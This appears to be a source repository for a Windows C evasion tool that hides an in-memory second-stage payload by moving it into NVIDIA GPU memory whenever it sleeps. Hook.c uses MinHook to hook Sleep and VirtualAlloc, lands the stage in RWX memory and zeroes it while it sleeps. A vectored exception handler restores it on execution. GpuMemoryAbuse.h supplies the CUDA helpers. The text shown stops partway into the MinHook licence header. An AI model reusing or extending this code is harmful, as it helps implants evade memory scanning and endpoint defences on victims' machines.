├── GP.sln
├── GP
    ├── .gitkeep
    ├── Common.h
    ├── GP.vcxproj
    ├── GP.vcxproj.filters
    ├── GP.vcxproj.user
    ├── GpuMemoryAbuse.h
    ├── Hook.c
    ├── MinHook.h
    ├── main.c
    └── minhook.x64.lib
├── LICENSE
├── README.md
└── images
    ├── .gitkeep
    └── demo1.png


/GP.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.1.32421.90
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GP", "GP\GP.vcxproj", "{41B5DBE8-4C71-4D31-9319-36373D96059F}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Debug|x64.Build.0 = Debug|x64
18 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Debug|x86.Build.0 = Debug|Win32
20 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Release|x64.ActiveCfg = Release|x64
21 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Release|x64.Build.0 = Release|x64
22 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Release|x86.ActiveCfg = Release|Win32
23 | 		{41B5DBE8-4C71-4D31-9319-36373D96059F}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {10BFFA93-32B1-4643-80C3-3E156BB22F36}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/GP/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/H1d3r/GPU_ShellCode/f873e726ae10719ea7c5502beaa5d217fc4f723b/GP/.gitkeep


--------------------------------------------------------------------------------
/GP/Common.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | #include <Windows.h>
 3 | 
 4 | // from GpuMemoryAbuse.h : check if a nividia gpu is present on the system, to do the thing
 5 | BOOL IsNvidiaGraphicsCardPresent();
 6 | 
 7 | // hook.c, this function does the following:
 8 | //	1- run functions that will initialize the cuda api struct and run other api to get us started ...
 9 | //	2- install 2 hooks, on sleep and on virtualalloc, using minhook library
10 | //	3- start the vector exception handler
11 | BOOL InitializeMemToGpu ();
12 | 
13 | 


--------------------------------------------------------------------------------
/GP/GP.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{41b5dbe8-4c71-4d31-9319-36373d96059f}</ProjectGuid>
 25 |     <RootNamespace>GP</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 77 |     <LinkIncremental>false</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 80 |     <LinkIncremental>true</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <SDLCheck>true</SDLCheck>
 89 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 90 |       <ConformanceMode>true</ConformanceMode>
 91 |     </ClCompile>
 92 |     <Link>
 93 |       <SubSystem>Console</SubSystem>
 94 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 98 |     <ClCompile>
 99 |       <WarningLevel>Level3</WarningLevel>
100 |       <FunctionLevelLinking>true</FunctionLevelLinking>
101 |       <IntrinsicFunctions>true</IntrinsicFunctions>
102 |       <SDLCheck>true</SDLCheck>
103 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
104 |       <ConformanceMode>true</ConformanceMode>
105 |     </ClCompile>
106 |     <Link>
107 |       <SubSystem>Console</SubSystem>
108 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
109 |       <OptimizeReferences>true</OptimizeReferences>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <SDLCheck>true</SDLCheck>
117 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
118 |       <ConformanceMode>true</ConformanceMode>
119 |     </ClCompile>
120 |     <Link>
121 |       <SubSystem>Console</SubSystem>
122 |       <GenerateDebugInformation>true</GenerateDebugInformation>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <SDLCheck>true</SDLCheck>
131 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
132 |       <ConformanceMode>true</ConformanceMode>
133 |     </ClCompile>
134 |     <Link>
135 |       <SubSystem>Console</SubSystem>
136 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
137 |       <OptimizeReferences>true</OptimizeReferences>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |     </Link>
140 |   </ItemDefinitionGroup>
141 |   <ItemGroup>
142 |     <ClCompile Include="Hook.c" />
143 |     <ClCompile Include="main.c" />
144 |   </ItemGroup>
145 |   <ItemGroup>
146 |     <ClInclude Include="GpuMemoryAbuse.h" />
147 |     <ClInclude Include="Common.h" />
148 |     <ClInclude Include="MinHook.h" />
149 |   </ItemGroup>
150 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
151 |   <ImportGroup Label="ExtensionTargets">
152 |   </ImportGroup>
153 | </Project>


--------------------------------------------------------------------------------
/GP/GP.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="main.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |     <ClCompile Include="Hook.c">
22 |       <Filter>Source Files</Filter>
23 |     </ClCompile>
24 |   </ItemGroup>
25 |   <ItemGroup>
26 |     <ClInclude Include="GpuMemoryAbuse.h">
27 |       <Filter>Header Files</Filter>
28 |     </ClInclude>
29 |     <ClInclude Include="Common.h">
30 |       <Filter>Header Files</Filter>
31 |     </ClInclude>
32 |     <ClInclude Include="MinHook.h">
33 |       <Filter>Header Files</Filter>
34 |     </ClInclude>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/GP/GP.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/GP/GpuMemoryAbuse.h:
--------------------------------------------------------------------------------
  1 | // the whole thing is from : https://github.com/vxunderground/VXUG-Papers/blob/main/GpuMemoryAbuse.cpp mwa mwa @vxunderground
  2 | 
  3 | #pragma once
  4 | #include <Windows.h>
  5 | #include "Common.h"
  6 | #pragma warning(disable:6011)
  7 | 
  8 | 
  9 | #define CUDACALL __stdcall
 10 | #define CUDA_SUCCESS 0
 11 | 
 12 | typedef struct PCUDE_CONTEXT* CUDA_CONTEXT;
 13 | typedef INT(CUDACALL* CUDAMEMORYALLOCATE)(ULONG_PTR, SIZE_T);
 14 | typedef INT(CUDACALL* CUDAINIT)(INT);
 15 | typedef INT(CUDACALL* CUDAGETDEVICECOUNT)(PINT);
 16 | typedef INT(CUDACALL* CUDAGETDEVICE)(PINT, INT);
 17 | typedef INT(CUDACALL* CUDACREATECONTEXT)(CUDA_CONTEXT*, DWORD, INT);
 18 | typedef INT(CUDACALL* CUDADESTROYCONTEXT)(CUDA_CONTEXT*);
 19 | typedef INT(CUDACALL* CUDAMEMORYCOPYTODEVICE)(ULONG_PTR, PVOID, SIZE_T);
 20 | typedef INT(CUDACALL* CUDAMEMORYCOPYTOHOST)(PVOID, ULONG_PTR, SIZE_T);
 21 | typedef INT(CUDACALL* CUDAMEMORYFREE)(ULONG_PTR);
 22 | CUDA_CONTEXT Context = NULL;
 23 | 
 24 | 
 25 | typedef struct _NVIDIA_API_TABLE {
 26 | 	HMODULE NvidiaLibary;
 27 | 	CUDAMEMORYALLOCATE CudaMemoryAllocate;
 28 | 	CUDAINIT CudaInit;
 29 | 	CUDAGETDEVICECOUNT CudaGetDeviceCount;
 30 | 	CUDAGETDEVICE CudaGetDevice;
 31 | 	CUDACREATECONTEXT CudaCreateContext;
 32 | 	CUDAMEMORYCOPYTODEVICE CudaMemoryCopyToDevice;
 33 | 	CUDAMEMORYCOPYTOHOST CudaMemoryCopyToHost;
 34 | 	CUDAMEMORYFREE CudaMemoryFree;
 35 | 	CUDADESTROYCONTEXT CudaDestroyContext;
 36 | } NVIDIA_API_TABLE, * PNVIDIA_API_TABLE;
 37 | 
 38 | 
 39 | NVIDIA_API_TABLE Api = { 0 };
 40 | 
 41 | 
 42 | SIZE_T StringLengthW(LPCWSTR String)
 43 | {
 44 | 	LPCWSTR String2;
 45 | 
 46 | 	for (String2 = String; *String2; ++String2);
 47 | 
 48 | 	return (String2 - String);
 49 | }
 50 | 
 51 | PWCHAR StringLocateCharW(PWCHAR String, INT Character)
 52 | {
 53 | 	do
 54 | 	{
 55 | 		if (*String == Character)
 56 | 			return (PWCHAR)String;
 57 | 
 58 | 	} while (*String++);
 59 | 
 60 | 	return NULL;
 61 | }
 62 | 
 63 | INT StringCompareStringRegionW(PWCHAR String1, PWCHAR String2, SIZE_T Count)
 64 | {
 65 | 	UCHAR Block1, Block2;
 66 | 	while (Count-- > 0)
 67 | 	{
 68 | 		Block1 = (UCHAR)*String1++;
 69 | 		Block2 = (UCHAR)*String2++;
 70 | 
 71 | 		if (Block1 != Block2)
 72 | 			return Block1 - Block2;
 73 | 
 74 | 		if (Block1 == '\0')
 75 | 			return 0;
 76 | 	}
 77 | 
 78 | 	return 0;
 79 | }
 80 | 
 81 | PWCHAR StringFindSubstringW(PWCHAR String1, PWCHAR String2)
 82 | {
 83 | 	PWCHAR pPointer = String1;
 84 | 	DWORD Length = (DWORD)StringLengthW(String2);
 85 | 
 86 | 	for (; (pPointer = StringLocateCharW(pPointer, *String2)) != 0; pPointer++)
 87 | 	{
 88 | 		if (StringCompareStringRegionW(pPointer, String2, Length) == 0)
 89 | 			return (PWCHAR)pPointer;
 90 | 	}
 91 | 
 92 | 	return NULL;
 93 | }
 94 | 
 95 | PWCHAR StringCopyW(PWCHAR String1, PWCHAR String2)
 96 | {
 97 | 	PWCHAR p = String1;
 98 | 
 99 | 	while ((*p++ = *String2++) != 0);
100 | 
101 | 	return String1;
102 | }
103 | 
104 | PWCHAR StringConcatW(PWCHAR String, PWCHAR String2)
105 | {
106 | 	StringCopyW(&String[StringLengthW(String)], String2);
107 | 
108 | 	return String;
109 | }
110 | 
111 | BOOL IsNvidiaGraphicsCardPresent()
112 | {
113 | 	DISPLAY_DEVICEW DisplayDevice; RtlZeroMemory(&DisplayDevice, sizeof(DISPLAY_DEVICEW));
114 | 	DisplayDevice.cb = sizeof(DISPLAY_DEVICEW);
115 | 
116 | 	DWORD dwDeviceId = ERROR_SUCCESS;
117 | 
118 | 	while (EnumDisplayDevicesW(NULL, dwDeviceId, &DisplayDevice, 0))
119 | 	{
120 | 		if (StringFindSubstringW(DisplayDevice.DeviceString, (PWCHAR)L"NVIDIA") != NULL)
121 | 			return TRUE;
122 | 	}
123 | 
124 | 	return FALSE;
125 | }
126 | 
127 | BOOL InitNvidiaCudaAPITable(PNVIDIA_API_TABLE Api)
128 | {
129 | 	Api->NvidiaLibary = LoadLibraryW(L"nvcuda.dll");
130 | 	if (Api->NvidiaLibary == NULL)
131 | 		return FALSE;
132 | 
133 | 	Api->CudaCreateContext = (CUDACREATECONTEXT)GetProcAddress(Api->NvidiaLibary, "cuCtxCreate_v2");
134 | 	Api->CudaGetDevice = (CUDAGETDEVICE)GetProcAddress(Api->NvidiaLibary, "cuDeviceGet");
135 | 	Api->CudaGetDeviceCount = (CUDAGETDEVICECOUNT)GetProcAddress(Api->NvidiaLibary, "cuDeviceGetCount");
136 | 	Api->CudaInit = (CUDAINIT)GetProcAddress(Api->NvidiaLibary, "cuInit");
137 | 	Api->CudaMemoryAllocate = (CUDAMEMORYALLOCATE)GetProcAddress(Api->NvidiaLibary, "cuMemAlloc_v2");
138 | 	Api->CudaMemoryCopyToDevice = (CUDAMEMORYCOPYTODEVICE)GetProcAddress(Api->NvidiaLibary, "cuMemcpyHtoD_v2");
139 | 	Api->CudaMemoryCopyToHost = (CUDAMEMORYCOPYTOHOST)GetProcAddress(Api->NvidiaLibary, "cuMemcpyDtoH_v2");
140 | 	Api->CudaMemoryFree = (CUDAMEMORYFREE)GetProcAddress(Api->NvidiaLibary, "cuMemFree_v2");
141 | 	Api->CudaDestroyContext = (CUDADESTROYCONTEXT)GetProcAddress(Api->NvidiaLibary, "cuCtxDestroy");
142 | 
143 | 	if (!Api->CudaCreateContext || !Api->CudaGetDevice || !Api->CudaGetDeviceCount || !Api->CudaInit || !Api->CudaDestroyContext)
144 | 		return FALSE;
145 | 
146 | 	if (!Api->CudaMemoryAllocate || !Api->CudaMemoryCopyToDevice || !Api->CudaMemoryCopyToHost || !Api->CudaMemoryFree)
147 | 		return FALSE;
148 | 
149 | 	return TRUE;
150 | }
151 | 
152 | BOOL InitAPITable2() {
153 | 
154 | 	INT DeviceCount = 0;
155 | 	INT Device = 0;
156 | 
157 | 	if (Api.CudaInit(0) != CUDA_SUCCESS)
158 | 		return FALSE;
159 | 
160 | 	if (Api.CudaGetDeviceCount(&DeviceCount) != CUDA_SUCCESS || DeviceCount == 0)
161 | 		return FALSE;
162 | 
163 | 	if (Api.CudaGetDevice(&Device, DeviceCount - 1) != CUDA_SUCCESS)
164 | 		return FALSE;
165 | 
166 | 	if (Api.CudaCreateContext(&Context, 0, Device) != CUDA_SUCCESS)
167 | 		return FALSE;
168 | 
169 | 	return TRUE;
170 | }
171 | 
172 | // mem to gpu helper
173 | ULONG_PTR RtlAllocateGpuMemory(PNVIDIA_API_TABLE Api, DWORD ByteSize)
174 | {
175 | 	ULONG_PTR GpuBufferPointer = NULL;
176 | 
177 | 	if (ByteSize == 0)
178 | 		return NULL;
179 | 
180 | 	if (Api->CudaMemoryAllocate((ULONG_PTR)&GpuBufferPointer, ByteSize) != CUDA_SUCCESS)
181 | 		return NULL;
182 | 
183 | 	return GpuBufferPointer;
184 | 
185 | }
186 | 
187 | // move to gpu memory and clean the payload
188 | ULONG_PTR ToGPU(PVOID Address, SIZE_T Size, PNVIDIA_API_TABLE Api) {
189 | 	ULONG_PTR storageGPU = NULL;
190 | 	if ((storageGPU = RtlAllocateGpuMemory(Api, (DWORD)Size)) == NULL) {
191 | 		printf("[!] RtlAllocateGpuMemory failed ... \n");
192 | 		return NULL;
193 | 	}
194 | 	Api->CudaMemoryCopyToDevice(storageGPU, (PVOID)Address, Size);
195 | 	printf("[i] Moved [ MEM 0x%p ] to [ GPU: 0x%p ] \n", (PVOID)Address, (PVOID)storageGPU);
196 | 
197 | 	ZeroMemory(Address, Size);
198 | 	return storageGPU;
199 | }
200 | 
201 | 
202 | // move to the memory, and free the gpu memory
203 | VOID ToMem(PVOID Address, SIZE_T Size, ULONG_PTR storageGPU, PNVIDIA_API_TABLE Api) {
204 | 	Api->CudaMemoryCopyToHost((PVOID)Address, storageGPU, Size);
205 | 	Api->CudaMemoryFree(storageGPU);
206 | 	printf("[i] Moved [ GPU 0x%p ] to [ MEM: 0x%p ] \n", (PVOID)storageGPU, (PVOID)Address);
207 | }
208 | 


--------------------------------------------------------------------------------
/GP/Hook.c:
--------------------------------------------------------------------------------
  1 | #include <Windows.h>
  2 | #include <stdio.h>
  3 | #include "Common.h"
  4 | #include "GpuMemoryAbuse.h"
  5 | #include "MinHook.h"
  6 | #pragma comment(lib, "minhook.x64.lib")
  7 | 
  8 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
  9 | // struct to hold the 2nd stage payload
 10 | struct BeaconConfig {
 11 | 
 12 | 	LPVOID		Stage2Address;	//where will it land
 13 | 	SIZE_T		Stage2Size;		//size of the 2nd stage
 14 | 	
 15 | 	ULONG_PTR	storageGPU;		//gpu address of where we will save the payload
 16 | };
 17 | struct BeaconConfig Conf = { 0 };
 18 | 
 19 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 20 | 
 21 | // the hooked functions:
 22 | typedef VOID	(WINAPI* SLEEP) (DWORD);
 23 | typedef LPVOID	(WINAPI* VIRTUALALLOC) (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
 24 | 
 25 | // keep a global variable unhooked
 26 | SLEEP fnSleep = NULL;
 27 | VIRTUALALLOC fnVirtualAlloc = NULL;
 28 | 
 29 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 30 | 
 31 | // function pre-definition
 32 | VOID WINAPI MySleep(DWORD dwMilliseconds);
 33 | LPVOID WINAPI MyVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
 34 | LONG NTAPI VEHHandler(PEXCEPTION_POINTERS pExceptInfo);
 35 | 
 36 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 37 | 
 38 | // function to install hooks and run the veh exception handler and get us started with the gpu
 39 | BOOL InitializeMemToGpu() {
 40 | 	if (!InitNvidiaCudaAPITable(&Api)) {
 41 | 		printf("[-] InitNvidiaCudaAPITable failed ... \n");
 42 | 		return FALSE;
 43 | 	}
 44 | 	if (!InitAPITable2()){
 45 | 		printf("[-] InitAPITable2 failed ... \n");
 46 | 		return FALSE;
 47 | 	}
 48 | 
 49 | 	fnSleep = Sleep;
 50 | 	fnVirtualAlloc = VirtualAlloc;
 51 | 	AddVectoredExceptionHandler(1, &VEHHandler);
 52 | 
 53 | 	if (MH_Initialize() != MH_OK) {
 54 | 		printf("[-] MH_Initialize failed... \n");
 55 | 		return FALSE;
 56 | 	}
 57 | 	if (MH_CreateHook(&Sleep, &MySleep, &fnSleep) != MH_OK) {
 58 | 		printf("[-] MH_CreateHook[1] failed... \n");
 59 | 		return FALSE;
 60 | 	}
 61 | 	if (MH_CreateHook(&VirtualAlloc, &MyVirtualAlloc, &fnVirtualAlloc) != MH_OK) {
 62 | 		printf("[-] MH_CreateHook [2] failed... \n");
 63 | 		return FALSE;
 64 | 	}
 65 | 	if (MH_EnableHook(&Sleep) != MH_OK) {
 66 | 		printf("[-] MH_EnableHook [1] failed... \n");
 67 | 		return FALSE;
 68 | 	}
 69 | 	if (MH_EnableHook(&VirtualAlloc) != MH_OK) {
 70 | 		printf("[-] MH_EnableHook [2] failed... \n");
 71 | 		return FALSE;
 72 | 	}
 73 | 	return TRUE;
 74 | }
 75 | 
 76 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 77 | // the function replacing Sleep
 78 | VOID WINAPI MySleep(DWORD dwMilliseconds) {
 79 | 	printf("[i] Sleeping for : %d\n", (unsigned int) dwMilliseconds);
 80 | 	DWORD Old;
 81 | 	
 82 | 	if (dwMilliseconds >= 400) { // interactive + jitter, idk its up to you
 83 | 		Conf.storageGPU = ToGPU(Conf.Stage2Address, Conf.Stage2Size, &Api);
 84 | 		if (!VirtualProtect(Conf.Stage2Address, Conf.Stage2Size, PAGE_READONLY, &Old)) {
 85 | 			printf("[-] VirtualProtect [RO] failed with error: %d \n", GetLastError());
 86 | 		}
 87 | 	}
 88 | 	
 89 | 	fnSleep(dwMilliseconds);
 90 | }
 91 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
 92 | 
 93 | // function replacing VirtualAlloc
 94 | LPVOID WINAPI MyVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect) {
 95 | 	DWORD Old;
 96 | 	LPVOID Stage2Address = fnVirtualAlloc(NULL, dwSize, flAllocationType, PAGE_READWRITE); // better than rwx allocation all at once 
 97 | 	
 98 | 	if (Stage2Address != NULL && dwSize != NULL){
 99 | 		VirtualProtect(Stage2Address, dwSize, PAGE_EXECUTE_READWRITE, &Old);
100 | 	}
101 | 	Conf.Stage2Address = Stage2Address;
102 | 	Conf.Stage2Size = dwSize;
103 | 	printf("[+] Landed 2nd Stage [%d] At : 0x%p \n", (unsigned int) Conf.Stage2Size, Conf.Stage2Address);
104 | 	// unhooking
105 | 	if (MH_DisableHook(&VirtualAlloc) != MH_OK) {
106 | 		printf("[-] MH_DisableHook failed... \n");
107 | 	}
108 | 
109 | 	return Stage2Address;
110 | }
111 | 
112 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------------//
113 | // the veh exception handler
114 | LONG NTAPI VEHHandler(PEXCEPTION_POINTERS pExceptInfo) {
115 | 
116 | 	ULONG_PTR ExptnAddress = pExceptInfo->ContextRecord->Rip;
117 | 	DWORD Old;
118 | 
119 | 	if (pExceptInfo->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION) {
120 | 		if (ExptnAddress >= (ULONG_PTR)Conf.Stage2Address && ExptnAddress <= (ULONG_PTR)((ULONG_PTR)Conf.Stage2Address + Conf.Stage2Size)) {
121 | 			if (!VirtualProtect(Conf.Stage2Address, Conf.Stage2Size, PAGE_EXECUTE_READWRITE, &Old)) {
122 | 				printf("[-] VirtualProtect [RWX] failed with error: %d \n", GetLastError());
123 | 			}
124 | 			ToMem(Conf.Stage2Address, Conf.Stage2Size, Conf.storageGPU, &Api);
125 | 			return EXCEPTION_CONTINUE_EXECUTION;
126 | 		}
127 | 		else {
128 | 			printf("[!] Exception Address Is From Un-Monitored Memory; 0x%0-16p \n", (void*)ExptnAddress);
129 | 		}
130 | 
131 | 	}
132 | 	else {
133 | 		printf("[!] The EXCEPTION at [ 0x%p ] isnt ACCESS_VIOLATION; 0x%0-8X \n", (void*)pExceptInfo->ContextRecord->Rip, pExceptInfo->ExceptionRecord->ExceptionCode);
134 | 	}
135 | 
136 | 	return EXCEPTION_CONTINUE_SEARCH;
137 | }


--------------------------------------------------------------------------------
/GP/MinHook.h:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  MinHook - The Minimalistic API Hooking Library for x64/x86
  3 |  *  Copyright (C) 2009-2017 Tsuda Kageyu.
  4 |  *  All rights reserved.
  5 |  *
  6 |  *  Redistribution and use in source and binary forms, with or without
  7 |  *  modification, are permitted provided that the following conditions
  8 |  *  are met:
  9 |  *
 10 |  *   1. Redistributions of source code must retain the above copyright
 11 |  *      notice, this list of conditions and the following disclaimer.
 12 |  *   2. Redistributions in binary form must reproduce the above copyright
 13 |  *      notice, this list of conditions and the following disclaimer in the
 14 |  *      documentation and/or other materials provided with the distribution.
 15 |  *
